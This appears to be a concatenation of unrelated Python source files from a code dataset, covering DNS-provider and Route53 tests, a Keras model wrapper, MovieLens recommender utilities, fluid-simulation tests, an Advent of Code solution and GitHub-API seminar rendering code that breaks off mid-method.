        next_page = response.xpath('//a[contains(@class, "pageNav-jump--next")]//@href').get()
        if next_page is not None:
            next_page = response.urljoin(next_page)
            yield scrapy.Request(next_page, callback=self.content_parse)
| 1,598 | 530 |
# Lookup tables of (id, label) pairs used to generate the car catalogue rows.
Engines = [
    (1, "Diesel"),
    (2, "Gasoline"),
    (3, "Electric")
]
Luxuries = [
    (1, "Cheap"),
    (2, "Standard"),
    (3, "Luxurious")
]
Companies = [
    (1, 'Skoda'),
    (2, 'Volvo'),
    (3, 'Toyota'),
    (4, 'Fiat')
]
def CalculateFuelConsumption(engineId, companyId, luxuryId):
    """Synthetic consumption figure: 100 + engineId*companyId*luxuryId + engineId
    (factored here as 100 + engineId * (companyId * luxuryId + 1))."""
    base = 100
    return base + engineId * (companyId * luxuryId + 1)
# Emit one SQL VALUES tuple per (engine, luxury, company) combination.
# print is invoked as a function with a single argument, which behaves
# identically on Python 2 and 3 -- the original multi-line print statement
# with backslash continuations was Python-2 only.
for e in Engines:
    for l in Luxuries:
        for c in Companies:
            carName = l[1] + " " + c[1] + " " + e[1] + " car"
            print("({0},{1},{2},'{3}',{4}),".format(
                c[0], e[0], l[0], carName,
                CalculateFuelConsumption(e[0], c[0], l[0])))
#
#
#
from __future__ import absolute_import, division, print_function, \
unicode_literals
from os.path import dirname, isfile, join
from unittest import TestCase
from yaml import safe_load
from yaml.constructor import ConstructorError
from octodns.record import Create
from octodns.provider.yaml import YamlProvider
from octodns.zone import SubzoneRecordException, Zone
from helpers import TemporaryDirectory
class TestYamlProvider(TestCase):
    """Round-trip and edge-case tests for the YAML provider.

    Python-3 compatibility fixes: ``filter(...)`` results are materialised as
    lists before ``len()``/indexing (``filter`` returns a lazy iterator on
    py3), ``dict.keys()`` is converted to a list before comparison, the
    removed ``ctx.exception.message`` attribute is replaced by
    ``str(ctx.exception)``, and the deprecated ``assertEquals`` alias is
    replaced by ``assertEqual``. All remain valid on Python 2 as well.
    """

    def test_provider(self):
        """Populate a zone, write it out, and verify a clean round trip."""
        source = YamlProvider('test', join(dirname(__file__), 'config'))

        zone = Zone('unit.tests.', [])
        dynamic_zone = Zone('dynamic.tests.', [])

        # With target we don't add anything
        source.populate(zone, target=source)
        self.assertEqual(0, len(zone.records))

        # without it we see everything
        source.populate(zone)
        self.assertEqual(18, len(zone.records))

        source.populate(dynamic_zone)
        self.assertEqual(5, len(dynamic_zone.records))

        # Assumption here is that a clean round-trip means that everything
        # worked as expected, data that went in came back out and could be
        # pulled in yet again and still match up. That assumes that the input
        # data completely exercises things. This assumption can be tested by
        # relatively well by running
        # ./script/coverage tests/test_octodns_provider_yaml.py and
        # looking at the coverage file
        # ./htmlcov/octodns_provider_yaml_py.html
        with TemporaryDirectory() as td:
            # Add some subdirs to make sure that it can create them
            directory = join(td.dirname, 'sub', 'dir')
            yaml_file = join(directory, 'unit.tests.yaml')
            dynamic_yaml_file = join(directory, 'dynamic.tests.yaml')
            target = YamlProvider('test', directory)

            # We add everything
            plan = target.plan(zone)
            creates = [c for c in plan.changes if isinstance(c, Create)]
            self.assertEqual(15, len(creates))
            self.assertFalse(isfile(yaml_file))

            # Now actually do it
            self.assertEqual(15, target.apply(plan))
            self.assertTrue(isfile(yaml_file))

            # Dynamic plan
            plan = target.plan(dynamic_zone)
            creates = [c for c in plan.changes if isinstance(c, Create)]
            self.assertEqual(5, len(creates))
            self.assertFalse(isfile(dynamic_yaml_file))
            # Apply it
            self.assertEqual(5, target.apply(plan))
            self.assertTrue(isfile(dynamic_yaml_file))

            # There should be no changes after the round trip
            reloaded = Zone('unit.tests.', [])
            target.populate(reloaded)
            included = [x for x in reloaded.records if x.name == 'included']
            self.assertDictEqual({'included': ['test']}, included[0]._octodns)

            self.assertFalse(zone.changes(reloaded, target=source))

            # A 2nd sync should still create everything
            plan = target.plan(zone)
            creates = [c for c in plan.changes if isinstance(c, Create)]
            self.assertEqual(15, len(creates))

            with open(yaml_file) as fh:
                data = safe_load(fh.read())

                # '' has some of both
                roots = sorted(data.pop(''), key=lambda r: r['type'])
                self.assertTrue('values' in roots[0])  # A
                self.assertTrue('geo' in roots[0])  # geo made the trip
                self.assertTrue('value' in roots[1])  # CAA
                self.assertTrue('values' in roots[2])  # SSHFP

                # these are stored as plural 'values'
                self.assertTrue('values' in data.pop('_srv._tcp'))
                self.assertTrue('values' in data.pop('mx'))
                self.assertTrue('values' in data.pop('naptr'))
                self.assertTrue('values' in data.pop('sub'))
                self.assertTrue('values' in data.pop('txt'))

                # these are stored as singular 'value'
                self.assertTrue('value' in data.pop('aaaa'))
                self.assertTrue('value' in data.pop('cname'))
                self.assertTrue('value' in data.pop('included'))
                self.assertTrue('value' in data.pop('ptr'))
                self.assertTrue('value' in data.pop('spf'))
                self.assertTrue('value' in data.pop('www'))
                self.assertTrue('value' in data.pop('www.sub'))

                # make sure nothing is left
                self.assertEqual([], list(data.keys()))

            with open(dynamic_yaml_file) as fh:
                data = safe_load(fh.read())

                # make sure new dynamic records made the trip
                dyna = data.pop('a')
                self.assertTrue('values' in dyna)
                # self.assertTrue('dynamic' in dyna)
                # TODO:

                # make sure new dynamic records made the trip
                dyna = data.pop('aaaa')
                self.assertTrue('values' in dyna)
                # self.assertTrue('dynamic' in dyna)

                dyna = data.pop('cname')
                self.assertTrue('value' in dyna)
                # self.assertTrue('dynamic' in dyna)

                dyna = data.pop('real-ish-a')
                self.assertTrue('values' in dyna)
                # self.assertTrue('dynamic' in dyna)

                dyna = data.pop('simple-weighted')
                self.assertTrue('value' in dyna)
                # self.assertTrue('dynamic' in dyna)

                # make sure nothing is left
                self.assertEqual([], list(data.keys()))

    def test_empty(self):
        """An empty zone file yields no records."""
        source = YamlProvider('test', join(dirname(__file__), 'config'))

        zone = Zone('empty.', [])

        # without it we see everything
        source.populate(zone)
        self.assertEqual(0, len(zone.records))

    def test_unsorted(self):
        """Unsorted zone files are rejected unless enforce_order is off."""
        source = YamlProvider('test', join(dirname(__file__), 'config'))

        zone = Zone('unordered.', [])

        with self.assertRaises(ConstructorError):
            source.populate(zone)

        source = YamlProvider('test', join(dirname(__file__), 'config'),
                              enforce_order=False)
        # no exception
        source.populate(zone)
        self.assertEqual(2, len(zone.records))

    def test_subzone_handling(self):
        """Records that fall under a managed sub-zone are rejected."""
        source = YamlProvider('test', join(dirname(__file__), 'config'))

        # If we add `sub` as a sub-zone we'll reject `www.sub`
        zone = Zone('unit.tests.', ['sub'])
        with self.assertRaises(SubzoneRecordException) as ctx:
            source.populate(zone)
        self.assertEqual('Record www.sub.unit.tests. is under a managed '
                         'subzone', str(ctx.exception))
| 6,912 | 1,873 |
import unittest
import os
import io
import sys
from unittest.mock import patch
from fzfaws.route53 import Route53
from fzfaws.utils import Pyfzf, FileLoader
from botocore.paginate import Paginator
from pathlib import Path
class TestRoute53(unittest.TestCase):
    """Unit tests for the fzfaws Route53 wrapper (fzf interaction mocked)."""

    def setUp(self):
        """Load the test config and silence stdout before building Route53."""
        fileloader = FileLoader()
        config_path = Path(__file__).resolve().parent.joinpath("../data/fzfaws.yml")
        fileloader.load_config_file(config_path=str(config_path))
        # Swallow anything the constructor prints.
        capturedOutput = io.StringIO()
        sys.stdout = capturedOutput
        self.route53 = Route53()

    def tearDown(self):
        """Restore the real stdout."""
        sys.stdout = sys.__stdout__

    def test_constructor(self):
        """Defaults and explicit profile/region are stored as given."""
        self.assertEqual(self.route53.zone_ids, [""])
        self.assertEqual(self.route53.profile, "default")
        self.assertEqual(self.route53.region, "us-east-1")
        route53 = Route53(profile="root", region="us-west-1")
        self.assertEqual(route53.zone_ids, [""])
        self.assertEqual(route53.profile, "root")
        self.assertEqual(route53.region, "us-west-1")

    @patch.object(Pyfzf, "execute_fzf")
    @patch.object(Pyfzf, "process_list")
    @patch.object(Paginator, "paginate")
    def test_set_zone_id(self, mocked_result, mocked_fzf_process, mocked_fzf_execute):
        """set_zone_id strips the /hostedzone/ prefix and honours explicit ids."""
        # Canned list_hosted_zones response page.
        mocked_result.return_value = [
            {
                "ResponseMetadata": {"HTTPStatusCode": 200, "RetryAttempts": 0,},
                "HostedZones": [
                    {
                        "Id": "/hostedzone/111111",
                        "Name": "bilibonshop.xyz.",
                        "Config": {"PrivateZone": False},
                        "ResourceRecordSetCount": 7,
                    },
                    {
                        "Id": "/hostedzone/222222",
                        "Name": "mealternative.com.",
                        "Config": {
                            "Comment": "HostedZone created by Route53 Registrar",
                            "PrivateZone": False,
                        },
                        "ResourceRecordSetCount": 7,
                    },
                ],
                "IsTruncated": False,
                "MaxItems": "100",
            }
        ]

        # general test
        mocked_fzf_execute.return_value = "111111"
        self.route53.set_zone_id()
        mocked_fzf_process.assert_called_with(
            [
                {"Id": "111111", "Name": "bilibonshop.xyz."},
                {"Id": "222222", "Name": "mealternative.com."},
            ],
            "Id",
            "Name",
        )
        self.assertEqual(self.route53.zone_ids, ["111111"])

        # parameter test
        self.route53.set_zone_id(multi_select=True)
        self.assertEqual(self.route53.zone_ids, ["111111"])
        self.route53.set_zone_id(zone_ids=["111111", "222222"])
        self.assertEqual(self.route53.zone_ids, ["111111", "222222"])
        self.route53.zone_ids = [""]
        # a bare string id is accepted as well as a list
        self.route53.set_zone_id(zone_ids="222222")
        self.assertEqual(self.route53.zone_ids, ["222222"])

        # empty result test
        self.route53.zone_ids = [""]
        mocked_fzf_execute.reset_mock()
        mocked_fzf_process.reset_mock()
        mocked_fzf_execute.return_value = ""
        mocked_result.return_value = []
        self.route53.set_zone_id()
        # with no zones there is nothing to process, fzf still runs once
        mocked_fzf_process.assert_not_called()
        mocked_fzf_execute.assert_called_once()
        self.assertEqual(self.route53.zone_ids, [""])

    def test_process_hosted_zone(self):
        """_process_hosted_zone reduces raw zone dicts to {Id, Name} pairs."""
        # general
        test_list = [
            {
                "Id": "/hostedzone/111111",
                "Name": "bilibonshop.xyz.",
                "Config": {"PrivateZone": False},
                "ResourceRecordSetCount": 7,
            },
            {
                "Id": "/hostedzone/222222",
                "Name": "mealternative.com.",
                "Config": {
                    "Comment": "HostedZone created by Route53 Registrar",
                    "PrivateZone": False,
                },
                "ResourceRecordSetCount": 7,
            },
        ]
        result = self.route53._process_hosted_zone(test_list)
        self.assertEqual(
            [
                {"Id": "111111", "Name": "bilibonshop.xyz."},
                {"Id": "222222", "Name": "mealternative.com."},
            ],
            result,
        )

        # empty result test
        test_list = []
        result = self.route53._process_hosted_zone(test_list)
        self.assertEqual([], result)

        # missing attr test: absent Name becomes None rather than raising
        test_list = [
            {"Id": "/hostedzone/111111",},
            {"Id": "/hostedzone/222222",},
        ]
        result = self.route53._process_hosted_zone(test_list)
        self.assertEqual(
            [{"Id": "111111", "Name": None}, {"Id": "222222", "Name": None}], result,
        )
| 4,853 | 1,582 |
from abc import ABC, abstractmethod
from keras.models import model_from_json
class BaseModel(ABC):
    """Abstract wrapper around a Keras model with JSON/weights persistence.

    Subclasses provide the architecture (build_model), its compilation
    (compile_model) and the train/evaluate/predict behaviour.
    """

    def __init__(self,
                 model_file_path=None,
                 weights_file_path=None,
                 verbosity=1):
        self.verbosity = verbosity
        # Restore the architecture from JSON when a path is given; otherwise
        # build and compile a fresh model.
        if model_file_path:
            with open(model_file_path, 'r') as model_file:
                self.model = model_from_json(model_file.read())
        else:
            self.model = self.build_model()
            self.compile_model()
        if weights_file_path:
            self.model.load_weights(weights_file_path)

    def save_to_disk(self, model_file_path, weights_file_path):
        """Persist the architecture (JSON) and the weights separately."""
        serialized = self.model.to_json()
        with open(model_file_path, 'w') as model_file:
            model_file.write(serialized)
        self.model.save_weights(weights_file_path)

    @abstractmethod
    def build_model(self):
        """Return the (uncompiled) model architecture."""

    @abstractmethod
    def compile_model(self):
        """Compile self.model (optimizer, loss, metrics)."""

    @abstractmethod
    def train(self, x, y, validation_data=None, callbacks=None):
        """Fit the model on x/y."""

    @abstractmethod
    def evaluate(self, x, y):
        """Score the model on x/y."""

    @abstractmethod
    def predict(self, x):
        """Run inference on x."""
| 1,163 | 357 |
# Copyright 2021-2022 Boris Shminke
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Useful Function for the Whole Course
====================================
"""
from typing import Optional, Tuple
import numpy as np
import pandas as pd
from implicit.nearest_neighbours import ItemItemRecommender
from rs_datasets import MovieLens
from rs_metrics import hitrate
from scipy.sparse import csr_matrix
from tqdm import tqdm
def pandas_to_scipy(
    pd_dataframe: pd.DataFrame,
    data_name: str,
    rows_name: str,
    cols_name: str,
    shape: Tuple[int, int],
) -> csr_matrix:
    """
    transform pandas dataset with three columns to a sparse matrix

    :param pd_dataframe: frame holding the three columns below
    :param data_name: column name with values for the matrix cells
    :param rows_name: column name with row numbers of the cells
    :param cols_name: column name with column numbers of the cells
    :param shape: a pair (total number of rows, total number of columns)
    :returns: a ``csr_matrix``
    """
    cell_values = pd_dataframe[data_name].astype(float)
    row_indices = pd_dataframe[rows_name]
    col_indices = pd_dataframe[cols_name]
    return csr_matrix((cell_values, (row_indices, col_indices)), shape=shape)
def movielens_split(
    ratings: pd.DataFrame,
    train_percentage: float,
    warm_users_only: bool = False,
) -> Tuple[pd.DataFrame, pd.DataFrame, Tuple[int, int]]:
    """
    split ``ratings`` dataset to train and test by timestamp

    Fix: the return annotation and docstring previously claimed the training
    part was a ``csr_matrix``; both halves are plain ``pandas`` frames.

    :param ratings: ratings dataset from MovieLens
    :param train_percentage: percentage of data to put into training dataset
    :param warm_users_only: test on only those users, who were in training set
    :returns: (train frame, test frame, (num_users, num_items)), the shape
        being ``max id + 1`` in each dimension
    """
    # Temporal split: everything before the quantile timestamp is training.
    time_split = ratings.timestamp.quantile(train_percentage)  # type: ignore
    train = ratings[ratings.timestamp < time_split]
    test = ratings[ratings.timestamp >= time_split]
    if warm_users_only:
        warm_users = list(set(train.user_id).intersection(set(test.user_id)))
        final_test = test[test.user_id.isin(warm_users)]
    else:
        final_test = test
    return (
        train,
        final_test,
        (ratings.user_id.max() + 1, ratings.item_id.max() + 1),
    )
def evaluate_implicit_recommender(
    recommender: ItemItemRecommender,
    train: csr_matrix,
    test: pd.DataFrame,
    split_test_users_into: int,
    top_k: int,
) -> float:
    """
    compute hit-rate for a recommender from ``implicit`` package

    :param recommender: some recommender from ``implicit`` package
    :param train: sparse matrix of ratings
    :param test: pandas dataset of ratings for testing
    :param split_test_users_into: split ``test`` by users into several chunks
        to fit into memory
    :param top_k: how many items to recommend to each user
    :returns: hitrate@10
    """
    all_recs = []
    # Recommend chunk-by-chunk so the dense score matrices stay small.
    test_users_parts = np.array_split(
        test.user_id.unique(), split_test_users_into
    )
    for test_users_part in tqdm(test_users_parts):
        # item_ids/weights come back as (n_users, top_k) arrays -- assumed
        # from the reshape below; confirm against the implicit API version.
        item_ids, weights = recommender.recommend(
            test_users_part, train[test_users_part], top_k
        )
        # Flatten to one (item_id, weight) row per recommendation.
        user_recs = pd.DataFrame(
            np.vstack([item_ids.reshape((1, -1)), weights.reshape((1, -1))]).T,
            columns=["item_id", "weight"],
        )
        # Each user contributed exactly top_k rows, in order.
        user_recs["user_id"] = np.repeat(test_users_part, top_k)
        all_recs.append(user_recs)
    all_recs_pd = pd.concat(all_recs)
    return hitrate(test, all_recs_pd)
def get_sparse_item_features(
    movielens: MovieLens, ratings: pd.DataFrame
) -> Tuple[csr_matrix, pd.DataFrame]:
    """
    extract item features (tags plus genres) from the MovieLens dataset

    Fixes: ``DataFrame.append`` (removed in pandas 2.0) is replaced by
    ``pd.concat``, and the column selection is copied before adding columns
    so we neither emit SettingWithCopyWarning nor mutate ``movielens.items``
    behind the caller's back.

    :param movielens: full MovieLens dataset
    :param ratings: ratings frame used to restrict which items are kept
    :returns: sparse matrix and a `pandas` DataFrame of item features (tags)
    """
    genres_data = movielens.items[["item_id", "genres"]].copy()
    genres_data["user_id"] = -1  # sentinel "user" marking genre-derived tags
    genres_data["tag"] = genres_data.genres.str.split("|")
    genres_tags = genres_data.explode("tag")[["item_id", "user_id", "tag"]]
    all_tags = pd.concat(
        [movielens.tags.drop(columns=["timestamp"]), genres_tags],
        ignore_index=True,
    )
    # Count how many times each (item, tag) pair occurs.
    agg_tags = (
        all_tags[all_tags.item_id.isin(ratings.item_id)]
        .groupby(["item_id", "tag"])
        .count()
        .reset_index()
    )
    agg_tags["tag_id"] = agg_tags.tag.astype("category").cat.codes
    return (
        pandas_to_scipy(
            agg_tags,
            "user_id",
            "item_id",
            "tag_id",
            (ratings.item_id.max() + 1, agg_tags.tag_id.max() + 1),
        ),
        agg_tags,
    )
def enumerate_users_and_items(ratings: pd.DataFrame) -> None:
    """inplace change of user and item IDs into 1-based consecutive numbers"""
    for column in ("user_id", "item_id"):
        codes = ratings[column].astype("category").cat.codes  # type: ignore
        ratings[column] = codes + 1
def filter_users_and_items(
    ratings: pd.DataFrame,
    min_items_per_user: Optional[int],
    min_users_per_item: Optional[int],
) -> pd.DataFrame:
    """
    leave only items with at least ``min_users_per_item`` users who rated them
    and only users who rated at least ``min_items_per_user``

    :param ratings: ratings dataset to filter
    :param min_items_per_user: if ``None`` then don't filter
    :param min_users_per_item: if ``None`` then don't filter
    :returns: filtered ratings dataset
    """
    result = ratings
    if min_items_per_user is not None:
        # Users keeping at least the required number of rated items.
        per_user = ratings.groupby("user_id").count().item_id
        keep_users = per_user[per_user >= min_items_per_user].reset_index()["user_id"]
        result = result[result.user_id.isin(keep_users)]
    if min_users_per_item is not None:
        # Items rated by at least the required number of users.
        per_item = ratings.groupby("item_id").count().user_id
        keep_items = per_item[per_item >= min_users_per_item].reset_index()["item_id"]
        result = result[result.item_id.isin(keep_items)]
    return result
| 6,504 | 2,089 |
from unittest import TestCase
import numpy as np
import numpy.testing as npt
from cavsim.base.fluids.fluid import Fluid
class TestFluid(TestCase):
    """Tests for cavsim's Fluid: default callbacks after construction, the
    internal norm-value helpers for scalar and array inputs, their public
    wrappers, and the callback properties (getter, setter, validation)."""
    def setUp(self):
        # The six positional args populate the fluid's norm_* properties
        # asserted throughout the tests below.
        self.fluid = Fluid(1, 2, 3, 4, 5, 6)
    def tearDown(self):
        # Drop the instance and leave a None placeholder between tests.
        del self.fluid
        self.fluid = None
    def test___init__(self):
        # A freshly constructed fluid has no override callbacks registered.
        f = Fluid(1, 2, 3, 4, 5, 6)
        self.assertEqual(None, f._density_cb)
        self.assertEqual(None, f._viscosity_cb)
        self.assertEqual(None, f._bulk_modulus_cb)
        self.assertEqual(None, f._vapor_pressure_cb)
    def test__density(self):
        # Scalar input yields the norm density; sequence input broadcasts.
        p = self.fluid.norm_pressure
        t = self.fluid.norm_temperature
        self.assertEqual(self.fluid.norm_density, self.fluid._density(p, t))
        answer = np.asarray([self.fluid.norm_density, self.fluid.norm_density])
        result = self.fluid._density([p, p], [t, t])
        self.assertEqual(answer.shape, result.shape)
        npt.assert_almost_equal(result, answer)
    def test__viscosity(self):
        self.assertEqual(self.fluid.norm_viscosity, self.fluid._viscosity(3, 4))
        answer = np.asarray([self.fluid.norm_viscosity, self.fluid.norm_viscosity])
        result = self.fluid._viscosity([3, 3], [4, 4])
        self.assertEqual(answer.shape, result.shape)
        npt.assert_allclose(result, answer)
    def test__bulk_modulus(self):
        self.assertEqual(self.fluid.norm_bulk_modulus, self.fluid._bulk_modulus(5))
        answer = np.asarray([self.fluid.norm_bulk_modulus, self.fluid.norm_bulk_modulus])
        result = self.fluid._bulk_modulus([5, 5])
        self.assertEqual(answer.shape, result.shape)
        npt.assert_allclose(result, answer)
    def test__vapor_pressure(self):
        self.assertEqual(self.fluid.norm_vapor_pressure, self.fluid._vapor_pressure(6))
        answer = np.asarray([self.fluid.norm_vapor_pressure, self.fluid.norm_vapor_pressure])
        result = self.fluid._vapor_pressure([6, 6])
        self.assertEqual(answer.shape, result.shape)
        npt.assert_allclose(result, answer)
    def test_density(self):
        # The public wrapper defers to the callback when one is registered.
        p = self.fluid.norm_pressure
        t = self.fluid.norm_temperature
        self.assertEqual(self.fluid.norm_density, self.fluid.density(p, t))
        self.fluid._density_cb = lambda x, y, z: 99
        self.assertEqual(99, self.fluid.density(p, t))
    def test_viscosity(self):
        self.assertEqual(self.fluid.norm_viscosity, self.fluid.viscosity(3, 4))
        self.fluid._viscosity_cb = lambda x, y, z: 88
        self.assertEqual(88, self.fluid.viscosity(3, 4))
    def test_bulk_modulus(self):
        self.assertEqual(self.fluid.norm_bulk_modulus, self.fluid.bulk_modulus(5))
        self.fluid._bulk_modulus_cb = lambda x, y: 77
        self.assertEqual(77, self.fluid.bulk_modulus(5))
    def test_vapor_pressure(self):
        self.assertEqual(self.fluid.norm_vapor_pressure, self.fluid.vapor_pressure(6))
        self.fluid._vapor_pressure_cb = lambda x, y: 66
        self.assertEqual(66, self.fluid.vapor_pressure(6))
    def test_density_cb(self):
        # Property accepts a callable or None and rejects anything else.
        # Test getter
        cb = lambda x, y, z: 99
        self.assertEqual(None, self.fluid.density_cb)
        self.fluid._density_cb = cb
        self.assertEqual(cb, self.fluid.density_cb)
        # Test setter
        self.fluid.density_cb = None
        self.assertEqual(None, self.fluid._density_cb)
        self.fluid.density_cb = cb
        self.assertEqual(cb, self.fluid._density_cb)
        with self.assertRaises(TypeError):
            self.fluid.density_cb = 123
    def test_viscosity_cb(self):
        # Test getter
        cb = lambda x, y, z: 99
        self.assertEqual(None, self.fluid.viscosity_cb)
        self.fluid._viscosity_cb = cb
        self.assertEqual(cb, self.fluid.viscosity_cb)
        # Test setter
        self.fluid.viscosity_cb = None
        self.assertEqual(None, self.fluid._viscosity_cb)
        self.fluid.viscosity_cb = cb
        self.assertEqual(cb, self.fluid._viscosity_cb)
        with self.assertRaises(TypeError):
            self.fluid.viscosity_cb = 123
    def test_bulk_modulus_cb(self):
        # Test getter
        cb = lambda x, y: 99
        self.assertEqual(None, self.fluid.bulk_modulus_cb)
        self.fluid._bulk_modulus_cb = cb
        self.assertEqual(cb, self.fluid.bulk_modulus_cb)
        # Test setter
        self.fluid.bulk_modulus_cb = None
        self.assertEqual(None, self.fluid._bulk_modulus_cb)
        self.fluid.bulk_modulus_cb = cb
        self.assertEqual(cb, self.fluid._bulk_modulus_cb)
        with self.assertRaises(TypeError):
            self.fluid.bulk_modulus_cb = 123
    def test_vapor_pressure_cb(self):
        # Test getter
        cb = lambda x, y: 99
        self.assertEqual(None, self.fluid.vapor_pressure_cb)
        self.fluid._vapor_pressure_cb = cb
        self.assertEqual(cb, self.fluid.vapor_pressure_cb)
        # Test setter
        self.fluid.vapor_pressure_cb = None
        self.assertEqual(None, self.fluid._vapor_pressure_cb)
        self.fluid.vapor_pressure_cb = cb
        self.assertEqual(cb, self.fluid._vapor_pressure_cb)
        with self.assertRaises(TypeError):
            self.fluid.vapor_pressure_cb = 123
| 5,194 | 1,928 |
#!/usr/bin/env python3
'''
Input is a group of one or more lines with letters.
Each letter = question to which the answer was 'yes'.
Each line represents survey answers by a person, contains one or more letter.
Adjacent lines are part of the same group.
For each group, count the number of questions to which all people answered 'yes'
'''
g_file = 'input.txt'  # puzzle input path, read by run()
#------------------------------------------------------------------------------
def _common_answers(group):
#------------------------------------------------------------------------------
    """Return the set of questions everyone in *group* answered 'yes' to."""
    common = None
    for person in group:
        common = person if common is None else common.intersection(person)
    return common
#------------------------------------------------------------------------------
def run(file_name=None):
#------------------------------------------------------------------------------
    """Count questions answered 'yes' by everyone in each group, summed.

    :param file_name: path to the input file; defaults to the module-level
        ``g_file`` so existing callers keep their behavior.
    :returns: the total count (also printed, as before).
    """
    if file_name is None:
        file_name = g_file
    all_groups = list()
    curr_group = list()
    for line in open(file_name).readlines():
        line = line.rstrip()
        if len(line) == 0:
            # blank line terminates the current group: evaluate its answers
            all_groups.append(_common_answers(curr_group))
            curr_group = list()
            continue
        # a person's answers are just the set of the line's characters
        curr_group.append(set(line))
    if len(curr_group) > 0:
        # the last group may not be followed by a trailing blank line
        all_groups.append(_common_answers(curr_group))
    # now count
    total = 0
    for idx, entry in enumerate(all_groups):
        total += len(entry)
        print("Group {}: {} ({})".format(idx, len(entry), entry))
    print("Count is {}".format(total))
    return total
#------------------------------------------------------------------------------
def main():
#------------------------------------------------------------------------------
    # Thin entry point so the processing logic stays importable/testable.
    run()
main()  # executed on import/run, matching the original script behavior
# Fixture exercising nni's annotation-to-API conversion.
# NOTE(review): foo, bar, avg_pool, max_poo, h_conv2 and h_conv3 are
# undefined here -- this reads as generated compile-time test input for the
# nni annotation tooling, not as runnable code; left byte-identical.
import nni
def max_pool(k):
    pass
h_conv1 = 1
nni.choice({'foo': foo, 'bar': bar})(1)
conv_size = nni.choice({2: 2, 3: 3, 5: 5, 7: 7}, name='conv_size')
abc = nni.choice({'2': '2', 3: 3, '(5 * 6)': 5 * 6, 7: 7}, name='abc')
h_pool1 = nni.function_choice({'max_pool': lambda : max_pool(h_conv1),
    'h_conv1': lambda : h_conv1,
    'avg_pool': lambda : avg_pool(h_conv2, h_conv3)}
    )
h_pool1 = nni.function_choice({'max_pool(h_conv1)': lambda : max_pool(
    h_conv1), 'avg_pool(h_conv2, h_conv3)': lambda : avg_pool(h_conv2,
    h_conv3)}, name='max_pool')
h_pool2 = nni.function_choice({'max_poo(h_conv1)': lambda : max_poo(h_conv1
    ), '(2 * 3 + 4)': lambda : 2 * 3 + 4, '(lambda x: 1 + x)': lambda : lambda
    x: 1 + x}, name='max_poo')
tmp = nni.qlognormal(1.2, 3, 4.5)
test_acc = 1
nni.report_intermediate_result(test_acc)
test_acc = 2
nni.report_final_result(test_acc)
from __future__ import annotations
import calendar
import logging
import os
from dataclasses import dataclass
from datetime import datetime
import dateparser
import requests
from markdown import markdown
def request_github_api(
    query_url: str, owner="geem-lab", token=None, logger=None
) -> dict:
    """Query the GitHub REST API and return the decoded JSON payload.

    Falls back to the ``GITHUB_TOKEN`` environment variable when no token is
    given, and raises ``PermissionError`` when GitHub rejects the credentials.
    """
    if token is None:
        token = os.environ.get("GITHUB_TOKEN", None)
    session = requests.Session()
    session.auth = (owner, token)
    headers = {
        "Accept": "application/vnd.github.v3+json",
        "Authorization": f"token {token}",
    }
    payload = session.get(
        query_url, headers=headers, params={"state": "all"}
    ).json()
    # The payload may be a list (e.g. issue listings); the "in" test works
    # for both dicts and lists.
    if "message" in payload and payload["message"] == "Bad credentials":
        raise PermissionError(
            "Github API token is invalid. Please set the GITHUB_TOKEN environment variable."
        )
    if logger is not None:
        logger.info(f"{query_url} returned:\n'{payload}'")
    return payload
def tag(tag_name):
    """Return a renderer that formats *tag_name* as an HTML element.

    The renderer joins truthy positional arguments as the element contents
    and keyword arguments as attributes; a trailing underscore in a keyword
    (e.g. ``class_``) is stripped so Python keywords can name attributes.
    Self-closing forms are produced when there are no contents.
    """

    def render(*args, **kwargs):
        def strip_trailing_underscore(key):
            return key[:-1] if key.endswith("_") else key

        attributes = " ".join(
            f'{strip_trailing_underscore(name)}="{value}"'
            for name, value in kwargs.items()
        )
        body = "".join(piece for piece in args if piece)
        if attributes and body:
            return f"<{tag_name} {attributes}>{body}</{tag_name}>"
        if attributes:
            return f"<{tag_name} {attributes} />"
        if body:
            return f"<{tag_name}>{body}</{tag_name}>"
        return f"<{tag_name} />"

    return render
# Pre-built renderers for the HTML elements used by the seminar markdown.
em = tag("em")
time = tag("time")
h2 = tag("h2")
p = tag("p")
strong = tag("strong")
a = tag("a")
details = tag("details")
summary = tag("summary")
span = tag("span")
li = tag("li")
ul = tag("ul")
small = tag("small")
img = tag("img")
@dataclass
class Seminar:
    """A single seminar, built directly or parsed from a GitHub issue."""

    title: str
    speaker: dict  # GitHub user payload; a login string is resolved in __post_init__
    description: str
    date: datetime

    STRFTIME_FORMAT = "%b %-d %Y"

    def __post_init__(self):
        # Allow passing just a GitHub login: resolve it to the full payload.
        if isinstance(self.speaker, str):
            self.speaker = request_github_api(
                f"https://api.github.com/users/{self.speaker}"
            )

    def _date_to_markdown(self):
        """Render the seminar date as a small, bold <time> element."""
        dt = time(
            "📅 ",
            self.date.strftime(self.STRFTIME_FORMAT),
            datetime=self.date.isoformat(),
        )
        return small(strong(dt))

    def _title_to_markdown(self):
        return em(self.title)

    @property
    def speaker_name(self):
        """The speaker's display name, falling back to their @login."""
        if "name" in self.speaker and self.speaker["name"]:
            return self.speaker["name"]
        return f"@{self.speaker['login']}"

    @property
    def speaker_url(self):
        return f"https://github.com/{self.speaker['login']}"

    def _speaker_name_to_markdown(self):
        return a(self.speaker_name, href=self.speaker_url)

    AVATAR_WIDTH = 128

    def _speaker_avatar_to_markdown(self):
        """Render the speaker's avatar as a linked image, or None if absent."""
        if "avatar_url" in self.speaker:
            return a(
                img(
                    src=self.speaker["avatar_url"],
                    alt=self.speaker["login"],
                    title=self.speaker_name,
                    align="left",
                    width=self.AVATAR_WIDTH,
                ),
                href=self.speaker_url,
            )
        return None

    def _description_to_markdown(self):
        return markdown(self.description)

    def to_markdown(self):
        """Render the seminar as a collapsible <details> block."""
        return details(
            summary(
                self._date_to_markdown(),
                " ",
                self._title_to_markdown(),
                " (",
                self._speaker_name_to_markdown(),
                ")",
            ),
            self._speaker_avatar_to_markdown(),
            self._description_to_markdown(),
        )

    DATE_MARKER = "**Date**:"
    SEMINAR_TITLE_MARKER = "[SEMINAR]"

    @classmethod
    def from_github_issue(cls, issue, logger=None):
        """Build a Seminar from a GitHub issue payload.

        The body is split on ``DATE_MARKER``: text before it becomes the
        description and the first line after it is parsed as the date.
        """
